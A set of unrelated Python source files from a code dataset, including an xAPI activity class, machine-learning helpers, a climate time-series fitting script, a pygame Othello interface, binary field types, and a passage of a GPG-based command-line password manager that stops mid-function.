1686273 | <filename>tincan/activity.py
# Copyright 2014 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tincan.serializable_base import SerializableBase
from tincan.statement_targetable import StatementTargetable
from tincan.activity_definition import ActivityDefinition
"""
.. module:: activity
:synopsis: The Activity object that defines the boundaries on the 'Object' \
part of 'Actor-Verb-Object' structure of a Statement
"""
class Activity(SerializableBase, StatementTargetable):
_props_req = [
'id',
'object_type'
]
_props = [
'definition',
]
_props.extend(_props_req)
def __init__(self, *args, **kwargs):
self._id = None
self._object_type = None
self._definition = None
super(Activity, self).__init__(*args, **kwargs)
@property
def id(self):
"""Id for Activity
:setter: Sets the id
:setter type: unicode
:rtype: unicode
"""
return self._id
@id.setter
def id(self, value):
if value is not None:
if value == '':
raise ValueError(
"Property 'id' in 'tincan.%s' object must be not empty."
% self.__class__.__name__)
self._id = None if value is None else unicode(value)
@property
def object_type(self):
"""Object type for Activity. Will always be "Activity"
:setter: Tries to convert to unicode
:setter type: unicode
:rtype: unicode
"""
return self._object_type
@object_type.setter
def object_type(self, _):
self._object_type = 'Activity'
@property
def definition(self):
"""Definition for Activity
:setter: Tries to convert to :class:`tincan.ActivityDefinition`
:setter type: :class:`tincan.ActivityDefinition`
:rtype: :class:`tincan.ActivityDefinition`
"""
return self._definition
@definition.setter
def definition(self, value):
if value is not None and not isinstance(value, ActivityDefinition):
value = ActivityDefinition(value)
self._definition = value
@definition.deleter
def definition(self):
del self._definition
| StarcoderdataPython |
3311537 | <filename>allencv/tests/predictors/object_detection/region_proposal_network.py
from allencv.common.testing import AllenCvTestCase
from allencv.data.dataset_readers import ImageAnnotationReader
from allencv.predictors import ImagePredictor
from allencv.models.object_detection import RPN
from allencv.modules.image_encoders import ResnetEncoder, FPN
class TestRegionProposalNetwork(AllenCvTestCase):
def test_predictor(self):
backbone = ResnetEncoder('resnet18')
fpn_out_channels = 256
fpn_backbone = FPN(backbone, fpn_out_channels)
anchor_sizes = [[32], [64], [128], [256], [512]]
anchor_aspect_ratios = [[0.5, 1.0, 2.0], [0.5, 1.0, 2.0], [0.5, 1.0, 2.0],
[0.5, 1.0, 2.0], [0.5, 1.0, 2.0]]
fpn_post_nms_top_n = 400
rpn = RPN(fpn_backbone,
anchor_sizes=anchor_sizes,
anchor_aspect_ratios=anchor_aspect_ratios,
fpn_post_nms_top_n=fpn_post_nms_top_n)
reader = ImageAnnotationReader()
predictor = ImagePredictor(rpn, reader)
predicted = predictor.predict(AllenCvTestCase.FIXTURES_ROOT / "data" / "image_annotation" / "images" / "00001.jpg")
assert all([len(x) == 4 for x in predicted['proposals']])
| StarcoderdataPython |
3394992 | """
Cannned responses for glance images
"""
from __future__ import absolute_import, division, unicode_literals
from mimic.canned_responses.json.glance.glance_images_json import (images,
image_schema)
def get_images():
"""
Canned response for glance images list call
"""
return images
def get_image_schema():
"""
Canned response for GET glance image schema API call
"""
return image_schema
| StarcoderdataPython |
4810405 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Fit annual var in single catchment example
Created on Tue Apr 27 16:40:46 2021
@author: lizz
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import statsmodels.api as sm
from statsmodels.tsa.ar_model import AutoReg, ar_select_order
from matplotlib import cm
import glob
model_names = ['ANICE-ITM_Berends', 'CESM_kampenhout', 'dEBM_krebs','HIRHAM_mottram',
'NHM-SMAP_niwano', 'RACMO_noel', 'SNOWMODEL_liston']
## Read in time series
def read_catchment_series(fpath, anomaly=True):
catchment_fpath = fpath
catchment_tseries = pd.read_csv(catchment_fpath, index_col=0, parse_dates=[0])
catchment_tseries.mask(catchment_tseries>1e30)
anomaly_series = catchment_tseries - catchment_tseries.mean()
if anomaly:
return anomaly_series
else:
return catchment_tseries
def fit_catchment_series(tseries, comparison_n=range(1,6), multi_model_mode=True,
strength_of_fit=False, seasonal=True):
bic_per_n = pd.DataFrame(index=comparison_n, columns=model_names)
for n in comparison_n:
for m in model_names:
mod = AutoReg(tseries[m], n, trend='ct', seasonal=seasonal)
results = mod.fit()
bic_per_n[m][n] = results.bic
if multi_model_mode:
for m in model_names:
bic_per_n[m] = pd.to_numeric(bic_per_n[m]) # needed for idxmin
best_n = bic_per_n.idxmin().mode()[0]
return best_n
mod_fits = {m: [] for m in model_names}
mod_resids = {m: [] for m in model_names}
basin_i=101
ctmt_fpath = glob.glob('/Users/lizz/Documents/GitHub/Data_unsynced/SMBMIP-processed/*-catchment_{}-tseries.csv'.format(basin_i))[0]
s = read_catchment_series(ctmt_fpath)
a = s.resample('A').sum()
best_n = fit_catchment_series(a, seasonal=False)
for m in model_names:
mod = AutoReg(a[m], best_n, trend='ct', seasonal=False).fit()
fv = mod.fittedvalues
r = mod.resid
mod_fits[m] = fv
mod_resids[m] = r
## Plot a single timeseries with AR(n) fit
colors_w = cm.get_cmap('Blues')(np.linspace(0.2, 1, num=len(model_names)))
fig2, ax2 = plt.subplots(figsize=(10,4))
for i,m in enumerate(model_names):
if 'NHM' in m:
ax2.plot(a[m], label=m, color=colors_w[i])
ax2.plot(mod_fits[m], color='k', alpha=0.8, marker='d',
label='AR({}) fit to {}'.format(best_n, m))
else:
pass
ax2.set(xlabel='Year', ylabel='Catchment SMB [mm w.e.]',
# title='Basin {}, all models'.format(basin_i)
title='Kangerlussuaq catchment, SMB model and AR(n) fit',
xticks=(np.datetime64('1980-01-01'), np.datetime64('1990-01-01'),
np.datetime64('2000-01-01'), np.datetime64('2010-01-01')),
xticklabels=(1980,1990,2000,2010)
)
ax2.legend(bbox_to_anchor=(1.05, 1.0, 0.3, 0.2), loc='upper left')
plt.tight_layout()
plt.show()
fig3, (ax3, ax4) = plt.subplots(2, figsize=(10,6), sharex=True)
for i,m in enumerate(model_names):
ax3.plot(a[m], label=m, color=colors_w[i])
if 'NHM' in m:
ax4.plot(a[m], label=m, color=colors_w[i])
ax4.plot(mod_fits[m], color='k', alpha=0.8, marker='d',
label='AR({}) fit to {}'.format(best_n, m))
else:
pass
ax3.set(ylabel='Catchment SMB [mm w.e.]',
title='Kangerlussuaq catchment, SMB models and AR(n) fit')
ax4.set(xlabel='Year', ylabel='Catchment SMB [mm w.e.]',
# title='Basin {}, all models'.format(basin_i)
# title='Kangerlussuaq catchment, SMB model and AR(n) fit',
xticks=(np.datetime64('1980-01-01'), np.datetime64('1990-01-01'),
np.datetime64('2000-01-01'), np.datetime64('2010-01-01')),
xticklabels=(1980,1990,2000,2010)
)
ax3.legend(bbox_to_anchor=(1.05, 1.0, 0.3, 0.2), loc='upper left')
ax4.legend(bbox_to_anchor=(1.05, 1.0, 0.3, 0.2), loc='upper left')
plt.tight_layout()
plt.show()
| StarcoderdataPython |
1609609 | <filename>tiny_video_nets/batch_norm.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Batch norm layer with optional relu activation function."""
import tensorflow.compat.v1 as tf # tf
BATCH_NORM_DECAY = 0.9
BATCH_NORM_EPSILON = 1e-5
def batch_norm_relu(inputs,
is_training,
relu=True,
init_zero=False,
bn_decay=BATCH_NORM_DECAY,
bn_epsilon=BATCH_NORM_EPSILON,
data_format='channels_first'):
"""Performs a batch normalization followed by a ReLU.
Args:
inputs: `Tensor` of shape `[batch, channels, ...]`.
is_training: `bool` for whether the model is training.
relu: `bool` if False, omits the ReLU operation.
init_zero: `bool` if True, initializes scale parameter of batch
normalization with 0 instead of 1 (default).
bn_decay: `float` batch norm decay parameter to use.
bn_epsilon: `float` batch norm epsilon parameter to use.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
Returns:
A normalized `Tensor` with the same `data_format`.
"""
if init_zero:
gamma_initializer = tf.zeros_initializer()
else:
gamma_initializer = tf.ones_initializer()
assert data_format == 'channels_last'
if data_format == 'channels_first':
axis = 1
else:
axis = -1
inputs = tf.layers.batch_normalization(
inputs=inputs,
axis=axis,
momentum=bn_decay,
epsilon=bn_epsilon,
center=True,
scale=True,
training=is_training,
fused=True,
gamma_initializer=gamma_initializer)
if relu:
inputs = tf.nn.relu(inputs)
return inputs
| StarcoderdataPython |
3238161 | <reponame>fightTone/CSC-171-Othello-game<gh_stars>0
import pygame, sys, pygame.mixer, time, os
from pygame.locals import *
EMPTY = 0
BLACK = 1
WHITE = 2
INFINITY = 999999999
MAX = 0
MIN = 1
DEFAULT_LEVEL = 2
HUMAN = "human"
COMPUTER = "computer"
RANDOM = "random"
class Gui:
def __init__(self):
pygame.init()
pygame.display.set_caption('Coolthello Game')
bg = pygame.image.load('res/back.jpg')
bg = pygame.transform.scale(bg, (720, 480))
self.BLACK = (0, 0, 0)
self.BACKGROUND = (112, 22, 27)
self.WHITE = (255, 255, 255)
self.BLUE = (0, 0, 255)
self.GRAY = (160, 160, 160)
self.SCREEN_SIZE = (640, 480)
self.BOARD_POS = (100, 20)
self.BOARD = (120, 40)
self.BOARD_SIZE = 400
self.SQUARE_SIZE = 50
self.screen = pygame.display.set_mode(self.SCREEN_SIZE)
self.BLACK_LAB_POS = (5, self.SCREEN_SIZE[1] / 4)
self.WHITE_LAB_POS = (560, self.SCREEN_SIZE[1] / 4)
self.scoreFont = pygame.font.SysFont("Garamond", 58, bold=True)
self.board_img = pygame.image.load(os.path.join(
"res", "board.bmp")).convert()
self.black_img = pygame.image.load(os.path.join(
"res", "preta.bmp")).convert()
self.white_img = pygame.image.load(os.path.join(
"res", "branca.bmp")).convert()
self.tip_img = pygame.image.load(os.path.join("res",
"tip.bmp")).convert()
self.clear_img = pygame.image.load(os.path.join("res",
"nada.bmp")).convert()
def show_options(self):
# default values
player1 = HUMAN
player2 = COMPUTER
level = DEFAULT_LEVEL
while True:
bg = pygame.image.load('res/back.jpg')
bg = pygame.transform.scale(bg, (720, 480))
title_image = pygame.image.load('res/Othello.png')
title_pos = title_image.get_rect(centerx=self.screen.get_width() / 2, centery=120)
start_img = pygame.image.load('res/start.png')
start_pos = start_img.get_rect(
centerx=self.screen.get_width() / 2, centery=280)
player1_txt = pygame.image.load('res/first-player.png')
player1_pos = player1_txt.get_rect(
centerx=self.screen.get_width() / 2, centery=320)
player2_txt = pygame.image.load('res/second-player.png')
player2_pos = player2_txt.get_rect(
centerx=self.screen.get_width() / 2, centery=360)
level_txt = pygame.image.load('res/computer-level.png')
level_pos = level_txt.get_rect(
centerx=self.screen.get_width() / 2, centery=400)
self.screen.blit(bg, [0,0])
self.screen.blit(title_image, title_pos)
self.screen.blit(start_img, start_pos)
self.screen.blit(player1_txt, player1_pos)
self.screen.blit(player2_txt, player2_pos)
self.screen.blit(level_txt, level_pos)
for event in pygame.event.get():
if event.type == QUIT:
sys.exit(0)
elif event.type == MOUSEBUTTONDOWN:
(mouse_x, mouse_y) = pygame.mouse.get_pos()
if start_pos.collidepoint(mouse_x, mouse_y):
return (player1, player2, level)
elif player1_pos.collidepoint(mouse_x, mouse_y):
player1 = self.get_chosen_player()
elif player2_pos.collidepoint(mouse_x, mouse_y):
player2 = self.get_chosen_player()
elif level_pos.collidepoint(mouse_x, mouse_y):
level = self.get_chosen_level()
pygame.display.flip()
def show_winner(self, player_color):
bg = pygame.image.load('res/back.jpg')
bg = pygame.transform.scale(bg, (720, 480))
win_white = pygame.image.load('res/win-white.png')
white_pos = win_white.get_rect(centerx=self.screen.get_width() / 2, centery=280)
win_black = pygame.image.load('res/win-black.png')
black_pos = win_black.get_rect(centerx=self.screen.get_width() / 2, centery=280)
tie = pygame.image.load('res/its-a-tie.png')
tie_pos = tie.get_rect(centerx=self.screen.get_width() / 2, centery=280)
if player_color == WHITE:
msg = pygame.image.load('res/win-white.png')
elif player_color == BLACK:
msg = pygame.image.load('res/win-black.png')
else:
msg = pygame.image.load('res/its-a-tie.png')
self.screen.blit(bg, [0,0])
self.screen.blit(
msg, msg.get_rect(
centerx=self.screen.get_width() / 2, centery=160))
pygame.display.flip()
def get_chosen_player(self):
while True:
bg = pygame.image.load('res/back.jpg')
bg = pygame.transform.scale(bg, (720, 480))
player_img = pygame.image.load('res/player.png')
player_pos = player_img.get_rect(
centerx=self.screen.get_width() / 2, centery=80)
human_img = pygame.image.load('res/Human.png')
human_pos = human_img.get_rect(
centerx=self.screen.get_width() / 2, centery=180)
random_txt = pygame.image.load('res/Random.png')
random_pos = random_txt.get_rect(
centerx=self.screen.get_width() / 2, centery=300)
comp_txt = pygame.image.load('res/Computer.png')
comp_pos = comp_txt.get_rect(
centerx=self.screen.get_width() / 2, centery=420)
self.screen.blit(bg, [0,0])
self.screen.blit(player_img, player_pos)
self.screen.blit(human_img, human_pos)
self.screen.blit(comp_txt, comp_pos)
self.screen.blit(random_txt, random_pos)
for event in pygame.event.get():
if event.type == QUIT:
sys.exit(0)
elif event.type == MOUSEBUTTONDOWN:
(mouse_x, mouse_y) = pygame.mouse.get_pos()
if human_pos.collidepoint(mouse_x, mouse_y):
return HUMAN
elif comp_pos.collidepoint(mouse_x, mouse_y):
return COMPUTER
elif random_pos.collidepoint(mouse_x, mouse_y):
return RANDOM
pygame.display.flip()
def get_chosen_level(self):
while True:
bg = pygame.image.load('res/back.jpg')
bg = pygame.transform.scale(bg, (720, 480))
title = pygame.image.load('res/choose-level.png')
title_pos = title.get_rect(
centerx=self.screen.get_width() / 2, centery=80)
one_txt = pygame.image.load('res/level-one.png')
one_pos = one_txt.get_rect(
centerx=self.screen.get_width() / 2, centery=180)
two_txt = pygame.image.load('res/level-two.png')
two_pos = two_txt.get_rect(
centerx=self.screen.get_width() / 2, centery=300)
three_txt = pygame.image.load('res/level-three.png')
three_pos = three_txt.get_rect(
centerx=self.screen.get_width() / 2, centery=420)
self.screen.blit(bg, [0,0])
self.screen.blit(title, title_pos)
self.screen.blit(one_txt, one_pos)
self.screen.blit(two_txt, two_pos)
self.screen.blit(three_txt, three_pos)
for event in pygame.event.get():
if event.type == QUIT:
sys.exit(0)
elif event.type == MOUSEBUTTONDOWN:
(mouse_x, mouse_y) = pygame.mouse.get_pos()
if one_pos.collidepoint(mouse_x, mouse_y):
return 1
elif two_pos.collidepoint(mouse_x, mouse_y):
return 2
elif three_pos.collidepoint(mouse_x, mouse_y):
return 3
pygame.display.flip()
time.sleep(.05)
def show_game(self):
bg = pygame.image.load('res/back.jpg')
bg = pygame.transform.scale(bg, (720, 480))
self.background = pygame.Surface(self.screen.get_size()).convert()
self.background.fill(self.BACKGROUND)
self.score_size = 50
self.score1 = pygame.Surface((self.score_size, self.score_size))
self.score2 = pygame.Surface((self.score_size, self.score_size))
self.screen.blit(self.background, (0, 0), self.background.get_rect())
self.screen.blit(self.board_img, self.BOARD_POS,
self.board_img.get_rect())
self.put_stone((3, 3), WHITE)
self.put_stone((4, 4), WHITE)
self.put_stone((3, 4), BLACK)
self.put_stone((4, 3), BLACK)
pygame.display.flip()
def put_stone(self, pos, color):
if pos == None:
return
pos = (pos[1], pos[0])
if color == BLACK:
img = self.black_img
elif color == WHITE:
img = self.white_img
else:
img = self.tip_img
x = pos[0] * self.SQUARE_SIZE + self.BOARD[0]
y = pos[1] * self.SQUARE_SIZE + self.BOARD[1]
self.screen.blit(img, (x, y), img.get_rect())
pygame.display.flip()
def clear_square(self, pos):
pos = (pos[1], pos[0])
x = pos[0] * self.SQUARE_SIZE + self.BOARD[0]
y = pos[1] * self.SQUARE_SIZE + self.BOARD[1]
self.screen.blit(self.clear_img, (x, y), self.clear_img.get_rect())
pygame.display.flip()
def get_mouse_input(self):
while True:
for event in pygame.event.get():
if event.type == MOUSEBUTTONDOWN:
(mouse_x, mouse_y) = pygame.mouse.get_pos()
if mouse_x > self.BOARD_SIZE + self.BOARD[0] or \
mouse_x < self.BOARD[0] or \
mouse_y > self.BOARD_SIZE + self.BOARD[1] or \
mouse_y < self.BOARD[1]:
continue
position = ((mouse_x - self.BOARD[0]) // self.SQUARE_SIZE), \
((mouse_y - self.BOARD[1]) // self.SQUARE_SIZE)
position = (position[1], position[0])
return position
elif event.type == QUIT:
sys.exit(0)
time.sleep(.05)
def update(self, board, blacks, whites, current_player_color):
for i in range(8):
for j in range(8):
if board[i][j] != 0:
self.put_stone((i, j), board[i][j])
blacks_str = ' '+ '%02d ' % int(blacks)
whites_str = '%02d ' % int(whites)
self.showScore(blacks_str, whites_str, current_player_color)
pygame.display.flip()
def showScore(self, blackStr, whiteStr, current_player_color):
black_background = self.GRAY if current_player_color == WHITE else self.BACKGROUND
white_background = self.GRAY if current_player_color == BLACK else self.BACKGROUND
text = self.scoreFont.render(blackStr, True, self.BLACK,
black_background)
text2 = self.scoreFont.render(whiteStr, True, self.WHITE,
white_background)
self.screen.blit(text,
(self.BLACK_LAB_POS[0], self.BLACK_LAB_POS[1] + 40))
self.screen.blit(text2,
(self.WHITE_LAB_POS[0], self.WHITE_LAB_POS[1] + 40))
def wait_quit(self):
for event in pygame.event.get():
if event.type == QUIT:
sys.exit(0)
elif event.type == KEYDOWN:
break
| StarcoderdataPython |
1672355 | """
Binary field is an interface used by binary structs.
Each field in binary structs must implement:
- serialization
- deserialization
- size property
Binary field is an interface for such these things.
PrimitiveTypeField is a primitive-ctypes based field,
and this file adds the classic primitive types that
implement BinaryField interface
"""
import sys
import struct
import ctypes
from enum import Enum
from abc import abstractmethod
class Endianness(Enum):
NONE = ''
BIG = 'be'
LITTLE = 'le'
HOST = LITTLE if sys.byteorder == 'little' else BIG
class BinaryField:
"""
An interface for memebers of a binary_struct.
NOTE: You shouldn't use this interface in your classes,
instead, use the binary_struct decorator
"""
@abstractmethod
def deserialize(self, buffer):
pass
@abstractmethod
def __bytes__(self) -> bytes:
pass
@abstractmethod
def __eq__(self, other) -> bool:
pass
@abstractmethod
def __str__(self) -> str:
pass
@property
@abstractmethod
def size_in_bytes(self):
pass
@staticmethod
def __bitwise_operation(op1, op2, operation) -> bytes:
op1_bytes = bytes(op1)
op2_bytes = bytes(op2)
bigger_buf_len = max(len(op1_bytes), len(op2_bytes))
op1_bytes += b'\x00' * (bigger_buf_len - len(op1_bytes))
op2_bytes += b'\x00' * (bigger_buf_len - len(op2_bytes))
return bytes(getattr(int, operation)(a, b) for (a, b) in zip(op1_bytes, op2_bytes))
def __and__(self, other) -> bytes:
return BinaryField.__bitwise_operation(self, other, '__and__')
def __or__(self, other) -> bytes:
return BinaryField.__bitwise_operation(self, other, '__or__')
def __xor__(self, other) -> bytes:
return BinaryField.__bitwise_operation(self, other, '__xor__')
def __invert__(self) -> bytes:
return bytes(~x & 0xff for x in bytes(self))
class PrimitiveTypeField(BinaryField):
"""
Designed for primitive ctypes types, implements BinaryField
"""
def deserialize(self, buffer):
if len(buffer) < self.size_in_bytes:
raise ValueError('Given buffer is too small!')
self.__init__(struct.unpack(self.FORMAT, buffer)[0])
@property
def size_in_bytes(self):
return ctypes.sizeof(self)
def __eq__(self, number) -> bool:
if isinstance(number, int):
return self.value == number
elif isinstance(number, PrimitiveTypeField):
return self.value == number.value
else:
super().__eq__(number)
@abstractmethod
def __str__(self) -> str:
endianness = "be" if ">" in self.FORMAT else Endianness.HOST.value
sign = "u" if self.FORMAT.isupper() else 'i'
return f'{endianness}_{sign}{self.size_in_bytes * 8}(0x{(self.value & 0xff):02X})'
def __bytes__(self) -> bytes:
return struct.pack(self.FORMAT, self.value)
class int8_t(ctypes.c_int8, PrimitiveTypeField):
FORMAT = 'b'
class uint8_t(ctypes.c_uint8, PrimitiveTypeField):
FORMAT = 'B'
class int16_t(ctypes.c_int16, PrimitiveTypeField):
FORMAT = 'h'
class uint16_t(ctypes.c_uint16, PrimitiveTypeField):
FORMAT = 'H'
class int32_t(ctypes.c_int32, PrimitiveTypeField):
FORMAT = 'i'
class uint32_t(ctypes.c_uint32, PrimitiveTypeField):
FORMAT = 'I'
class int64_t(ctypes.c_int64, PrimitiveTypeField):
FORMAT = 'q'
class uint64_t(ctypes.c_uint64, PrimitiveTypeField):
FORMAT = 'Q'
def big_endian_field(cls=None):
"""
Makes sure that a BinaryField is big endian
"""
def wrap(cls):
cls.FORMAT = f'>{cls.FORMAT}'
return cls
if cls is None:
return wrap
return wrap(cls)
@big_endian_field
class be_int8_t(int8_t):
pass
@big_endian_field
class be_uint8_t(uint8_t):
pass
@big_endian_field
class be_int16_t(int16_t):
pass
@big_endian_field
class be_uint16_t(uint16_t):
pass
@big_endian_field
class be_int32_t(int32_t):
pass
@big_endian_field
class be_uint32_t(uint32_t):
pass
@big_endian_field
class be_int64_t(int64_t):
pass
@big_endian_field
class be_uint64_t(uint64_t):
pass
| StarcoderdataPython |
41583 | import os
import ast
import sys
import math
import time
import string
import hashlib
import tempfile
import subprocess
from operator import itemgetter
from contextlib import contextmanager
from getpass import getpass
import random; random = random.SystemRandom()
import sdb.subprocess_compat as subprocess
from sdb.util import force_bytes
from sdb.clipboard import set_clipboard_once, ClipboardException
from sdb.diceware import WORDS
from sdb import gpg_agent
def encode(records):
res = []
for record in records:
res.append(repr(record))
return ('\n'.join(res) + '\n').encode('utf-8')
def decode(str):
records = []
for line in str.decode('utf-8').split('\n'):
if line:
records.append(ast.literal_eval(line))
return records
CASE_ALPHABET = string.ascii_letters
ALPHANUMERIC = CASE_ALPHABET + string.digits
EVERYTHING = ALPHANUMERIC + string.punctuation
def gen_password(choices=ALPHANUMERIC, length=10):
return ''.join(random.choice(choices) for i in range(length))
def requirements_satisfied(requirements, str):
return all([i in str for i in requirements])
def gen_password_require(requirements, choices=ALPHANUMERIC, length=10):
"""
Generate a password containing all the characters in requirements
"""
if len(requirements) > length or not requirements_satisfied(requirements, choices):
raise Exception(
"That's impossible, you can't make a password containing %r with only %r!" % (
requirements, choices))
while True:
pw = gen_password(choices, length)
if requirements_satisfied(requirements, pw):
return pw
def gen_password_entropy(entropy, choices=ALPHANUMERIC):
"""
Generates a password of the desired entropy, calculating the length as
required.
"""
required_length = int(math.ceil(entropy / math.log(len(choices), 2)))
return gen_password(choices=choices, length=required_length)
def match(needle, haystack):
score = 1
j = 0
last_match = 0
for c in needle:
while j < len(haystack) and haystack[j] != c:
j += 1
if j >= len(haystack):
return 0
score += 1 / (last_match + 1.)
last_match = j
j += 1
return score
def record_score(term, records):
return match(term, records[0] + records[1] + records[3])
def search(term, records):
records = [(record_score(term, i), i) for i in records]
records = list(filter(itemgetter(0), records))
records.sort(key=itemgetter(0), reverse=True)
return [i[1] for i in records]
def is_unique_list(lst):
return len(lst) == len(set(lst))
def disambiguate(records):
choices = [itemgetter(0),
itemgetter(0, 1),
itemgetter(0, 1, 3)]
for choice in choices:
result = list(map(choice, records))
if is_unique_list(result):
return result
# just in case none were unique
return records
class GPGException(Exception):
pass
class IncorrectPasswordException(GPGException):
pass
class InvalidEncryptedFileException(GPGException):
pass
class FileCorruptionException(GPGException):
pass
def gpg_exception_factory(returncode, message):
if returncode == 2:
if b'decryption failed: bad key' in message:
return IncorrectPasswordException(message)
if b'CRC error;' in message:
return FileCorruptionException(message)
if b'fatal: zlib inflate problem: invalid distance' in message:
return FileCorruptionException(message)
if b'decryption failed: invalid packet' in message:
return FileCorruptionException(message)
if b'no valid OpenPGP data found':
return InvalidEncryptedFileException(message)
return Exception("unkown error", returncode, message)
def dencrypt(command, pw, data):
"""
Encrypts or decrypts, by running command
"""
if '\n' in pw:
raise Exception('Newlines not allowed in passwords')
proc = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
proc.stdin.write(force_bytes(pw))
proc.stdin.write(b'\n')
proc.stdin.write(data)
output, erroroutput = proc.communicate()
if proc.returncode != 0:
raise gpg_exception_factory(proc.returncode, erroroutput)
return output
def encrypt(pw, data):
return dencrypt(
['gpg', '-c',
'--passphrase-fd', '0',
'--batch',
'--armor',
'--cipher-algo', 'AES',
'--digest-algo', 'SHA256'],
pw,
data,
)
def decrypt(pw, data):
return dencrypt(
['gpg', '-d', '--passphrase-fd', '0', '--batch'],
pw,
data
)
def get_tmp_file(filename):
file_parts = os.path.split(filename)
return os.path.join(*file_parts[:-1] + ('.' + file_parts[-1].lstrip('.') + '.tmp',))
def get_backup_file(filename):
file_parts = os.path.split(filename)
return os.path.join(*file_parts[:-1] + ('.' + file_parts[-1].lstrip('.') + '.bak',))
@contextmanager
def atomic_replace(filename):
"""
::
with atomic_replace(filename) as f:
f.write('asdf')
with atomic_replace(filename) as f:
f.write('asdf')
raise Exception
# nothing happens to the file
"""
tmpfile_name = get_tmp_file(filename)
fd = os.open(tmpfile_name, os.O_CREAT | os.O_EXCL | os.O_RDWR, 0o600)
try:
f = os.fdopen(fd, "w+b")
yield f
f.flush()
os.fsync(fd) # fdatasync? I don't know
f.seek(0)
new_content = f.read()
if not new_content:
raise Exception("I don't think you want to blank this file...")
try:
with open(filename, 'rb') as current_f:
current_content = current_f.read()
except IOError:
current_content = b''
if current_content != new_content:
with open(get_backup_file(filename), 'w+b') as backup_file:
backup_file.write(current_content)
except:
# If there was an exception, remove the temporary file and reraise
os.unlink(tmpfile_name)
raise
else:
# No exception, rename the temp file over the original
os.rename(tmpfile_name, filename)
finally:
f.close()
def edit_in_editor(current):
EDITOR = os.environ.get('EDITOR', 'vim')
with tempfile.NamedTemporaryFile(mode='w+') as f:
try:
f.write(current)
f.flush()
subprocess.call([EDITOR, f.name])
f.seek(0)
return f.read()
finally:
# don't leave potentially private data lying around
f.write('0' * os.path.getsize(f.name))
f.flush()
def pretty_record(record):
s = '%s@%s' % (record[1], record[0])
if record[3]:
s += ': ' + record[3]
return s
class InteractiveSession(object):
def __init__(self, args, output=sys.stdout, input=sys.stdin, password=None):
self.args = args
self.file = args.file
self.output = output
self.input = input
try:
self.gpg_agent = gpg_agent.GpgAgent()
except KeyError:
self.gpg_agent = None
self.gpg_agent_password_id = 'sdb_m:{file_fingerprint}'.format(
file_fingerprint=hashlib.md5(force_bytes(self.file)).hexdigest()
)
self.password = password
if not self.password:
self.password = self.get_master_password()
def get_master_password(self, error=None):
if self.password:
return self.password
if self.input == sys.stdin:
if self.gpg_agent:
error = error or 'X'
self.password = self.gpg_agent.get_passphrase(
self.gpg_agent_password_id,
prompt='Master password',
error=error
)
else:
if error:
self.output.write('Error: {error}, try again: '.format(error=error))
self.password = getpass()
else:
self.output.write('Password: ')
self.output.flush()
self.password = self.input.readline().rstrip('\n')
return self.password
def clear_master_password(self):
self.password = None
if self.gpg_agent:
self.gpg_agent.clear_passphrase(self.gpg_agent_password_id)
def prompt(self, prompt='', required=True, password=False):
while True:
if password and self.input == sys.stdin:
line = getpass(prompt)
else:
self.output.write(prompt)
self.output.flush()
line = self.input.readline().rstrip('\n')
if not required or line:
return line
def get_record(self, domain=None):
domain = domain or self.prompt('Domain: ')
username = self.prompt('Username: ')
password = self.prompt(
'Password [blank to generate]: ',
required=False,
password=True
) or gen_password_entropy(128)
notes = self.prompt('Notes: ', required=False)
return (domain, username, password, notes)
def edit_record(self, record):
new_record = list(record)
new_record[0] = self.prompt('Name [%s]: ' % record[0], required=False) or record[0]
new_record[1] = self.prompt('Username [%s]: ' % record[1], required=False) or record[1]
pw = self.prompt('Password []/g: ', required=False, password=True) or record[2]
if pw == 'g':
new_record[2] = gen_password_entropy(128)
elif pw:
new_record[2] = pw
self.output.write("Notes: %s\n" % record[3])
edit = self.prompt('Edit? [n]: ', required=False) or 'n'
if edit[0] == 'y':
new_record[3] = edit_in_editor(record[3])
return tuple(new_record)
def find_record(self, query, records):
possibilities = search(query, records)
if len(possibilities) > 1:
choices = disambiguate(possibilities)
for i, choice in enumerate(choices):
self.output.write('%s) %s\n' % (i, choice))
choice = self.prompt('Which did you mean? [0]: ', required=False) or 0
return possibilities[int(choice)]
else:
return possibilities[0]
def read_records(self, error=None):
try:
with open(self.file, 'rb') as f:
password = self.get_master_password(error)
try:
return decode(decrypt(password, f.read()))
except IncorrectPasswordException:
self.clear_master_password()
return self.read_records(error='Incorrect password')
except:
self.clear_master_password()
raise
except IOError:
return []
def add_action(self):
record = self.get_record(self.args.domain or self.prompt('Domain: '))
def add(records):
return records + [record]
self.edit_transaction(add)
def show_action(self, clipboard=10):
record = self.find_record(self.args.domain or self.prompt("Domain: "), self.read_records())
self.output.write(pretty_record(record))
self.output.write("\n")
if clipboard:
try:
self.output.write("username in clipboard\n")
set_clipboard_once(record[1])
self.output.write("password in clipboard\n")
set_clipboard_once(record[2])
except ClipboardException as e:
self.output.write("couldn't set clipboard: %s\n" % e.output.split('\n')[0])
self.output.write(record[2])
self.output.write("\n")
else:
return record[2]
def edit_transaction(self, callback):
with atomic_replace(self.file) as out:
records = callback(self.read_records())
assert isinstance(records, list)
if not is_unique_list(records):
raise Exception("You have two identical records. I don't think you want this.")
out.write(encrypt(self.password, encode(records)))
out.seek(0)
assert records == decode(decrypt(self.password, out.read()))
def edit_action(self):
def edit(records):
record = self.find_record(self.args.domain or self.prompt('Domain: '), records)
new_record = self.edit_record(record)
for i, choice in enumerate(records):
if choice == record:
records[i] = tuple(new_record)
return records
self.edit_transaction(edit)
def delete_action(self):
def delete(records):
record = self.find_record(self.args.domain or self.prompt('Domain: '), records)
